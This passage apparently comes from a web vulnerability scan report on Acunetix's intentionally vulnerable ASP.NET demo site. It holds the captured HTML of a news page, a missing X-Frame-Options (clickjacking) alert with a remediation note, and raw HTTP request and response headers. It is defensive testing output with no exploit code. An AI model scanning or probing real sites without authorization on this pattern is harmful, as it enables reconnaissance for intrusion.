ZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 17827Response body (17827 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1b